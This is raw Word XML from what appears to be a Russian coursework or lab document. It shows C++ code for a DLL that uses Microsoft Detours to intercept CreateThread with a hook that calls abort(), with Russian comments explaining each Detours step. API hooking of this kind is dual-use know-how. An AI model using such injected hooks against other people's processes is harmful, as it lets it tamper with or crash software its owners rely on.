          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SIZE_T</w:t>
      </w:r>
      <w:r w:rsidRPr="00A672CA">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">                  dwStackSize,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041B1001"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2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LPTHREAD_START_ROUTINE</w:t>
      </w:r>
      <w:r w:rsidRPr="00A672CA">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  lpStartAddress,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D41B9F3"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6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>__drv_aliasesMem</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2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LPVOID</w:t>
      </w:r>
      <w:r w:rsidRPr="00A672CA">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> lpParameter,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8772F8"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2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DWORD</w:t>
      </w:r>
      <w:r w:rsidRPr="00A672CA">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">                   dwCreationFlags,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5052902D"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2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LPDWORD</w:t>
      </w:r>
      <w:r w:rsidRPr="00A672CA">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">                 lpThreadId</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A71E066" w14:textId="527E1CBD"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 = CreateThread;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBA588F"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0E445F0"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2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HANDLE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6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WINAPI</w:t>
      </w:r>
      <w:r w:rsidRPr="00A672CA">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> HookCreateThread(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505BAF73"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2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LPSECURITY_ATTRIBUTES</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808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lpThreadAttributes</w:t>
      </w:r>
      <w:r w:rsidRPr="00A672CA">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6866AF82"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2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SIZE_T</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808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dwStackSize</w:t>
      </w:r>
      <w:r w:rsidRPr="00A672CA">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466806A3"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2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LPTHREAD_START_ROUTINE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808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lpStartAddress</w:t>
      </w:r>
      <w:r w:rsidRPr="00A672CA">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD37116"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6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>__drv_aliasesMem</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2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LPVOID</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808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lpParameter</w:t>
      </w:r>
      <w:r w:rsidRPr="00A672CA">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA6129E"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2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DWORD</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808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dwCreationFlags</w:t>
      </w:r>
      <w:r w:rsidRPr="00A672CA">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3724DEA9"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r>
      <w:r w:rsidRPr="00A672CA">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LPDWORD</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808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lpThreadId</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7EDA21"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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4982EA92"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ab/>
        <w:t>abort();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6DC0ED"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000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138F0E6E"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2294CA1" w14:textId="77777777" w:rsidR="00A672CA" w:rsidRP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A672CA">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>BOOL</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6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>APIENTRY</w:t>
      </w:r>
      <w:r w:rsidRPr="00A672CA">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> DllMain(</w:t>
      </w:r>
      <w:r w:rsidRPr="00A672CA">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HMODULE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808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hModule</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2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DWORD</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808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ul_reason_for_call</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2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LPVOID</w:t>
      </w:r>
      <w:r w:rsidRPr="00A672CA">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A672CA">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lpReserved</w:t>
      </w:r>
      <w:r w:rsidRPr="00A672CA">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356D9EF2" w14:textId="77777777" w:rsidR="00A672CA" w:rsidRPr="00211F1E"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211F1E">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49777777" w14:textId="77777777" w:rsidR="00A672CA" w:rsidRPr="00211F1E"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211F1E">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00211F1E">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r w:rsidRPr="00211F1E">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="00211F1E">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ul_reason_for_call</w:t>
      </w:r>
      <w:r w:rsidRPr="00211F1E">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> == </w:t>
      </w:r>
      <w:r w:rsidRPr="00211F1E">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DLL_PROCESS_ATTACH</w:t>
      </w:r>
      <w:r w:rsidRPr="00211F1E">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD3A657" w14:textId="1498BB4C" w:rsid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rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211F1E">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00211F1E">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">DetourTransactionBegin(); </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>// вызывается перед установкой/снятием хука</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA1351E" w14:textId="77777777" w:rsid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 xml:space="preserve">DetourUpdateThread(GetCurrentThread()); </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>// инициализирует установку/снятие хука для указанного потока</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627F8DBF" w14:textId="77777777" w:rsid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DetourAttach(&amp;(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>PVOID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;)pCreateThread, HookCreateThread); </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>// выполняет подмену заданного вызова</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526DCE06" w14:textId="77777777" w:rsid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2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>LONG</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> err = DetourTransactionCommit(); </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>// После выполнения подмены нужно завершить транзакцию вызовом функции</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59859CC3" w14:textId="77777777" w:rsidR="00A672CA" w:rsidRPr="00211F1E"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rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00211F1E">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r w:rsidRPr="00211F1E">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (err != </w:t>
      </w:r>
      <w:r w:rsidRPr="00211F1E">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NO_ERROR</w:t>
      </w:r>
      <w:r w:rsidRPr="00211F1E">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DBC3D9" w14:textId="77777777" w:rsidR="00A672CA" w:rsidRPr="00211F1E" w:rsidRDefault="00A672CA" w:rsidP="00A672CA">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211F1E">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00211F1E">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00211F1E">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00211F1E">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="00211F1E">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF541F6" w14:textId="77777777" w:rsid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rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211F1E">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF04405" w14:textId="77777777" w:rsidR="00A672CA" w:rsidRDefault="00A672CA" w:rsidP="00A672CA">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>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FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>TRUE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3493842B" w14:textId="056E62DD" w:rsidR="00A672CA" w:rsidRPr="00A672CA" w:rsidRDefault="00A672CA" w:rsidP="00A672CA">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00A672CA" w:rsidRPr="00A672CA" w:rsidSect="008219C3">
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="1134" w:right="850" w:bottom="1276"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EBEA3" w14:textId="77777777" w:rsidR="008E6324" w:rsidRPr="00D60F71" w:rsidRDefault="008E6324" w:rsidP="00D60F71">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="24701AA7" w14:textId="77777777" w:rsidR="008E6324" w:rsidRPr="00D60F71" w:rsidRDefault="008E6324" w:rsidP="00D60F71">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:bCs w:val="0"/>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362253"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtContent>
      <w:p w14:paraId="15CCF800" w14:textId="77777777" w:rsidR="00C218F6" w:rsidRDefault="00C218F6" w:rsidP="00B10DC6">
        <w:pPr>
          <w:pStyle w:val="afc"/>
          <w:ind w:firstLine="0"/>
          <w:jc w:val="center"/>
        </w:pPr>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText>PAGE   \* MERGEFORMAT</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00CB326B">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>6</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:p>
    </w:sdtContent>
  </w:sdt>
  <w:p w14:paraId="7352D271" w14:textId="77777777" w:rsidR="00C218F6" w:rsidRPr="00C53ADA" w:rsidRDefault="00C218F6" w:rsidP="00C53ADA">
    <w:pPr>
      <w:pStyle w:val="afc"/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="center"/>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E6A35" w14:textId="77777777" w:rsidR="008E6324" w:rsidRPr="00D60F71" w:rsidRDefault="008E6324" w:rsidP="00D60F71">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="41112102" w14:textId="77777777" w:rsidR="008E6324" w:rsidRPr="00D60F71" w:rsidRDefault="008E6324" w:rsidP="00D60F71">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
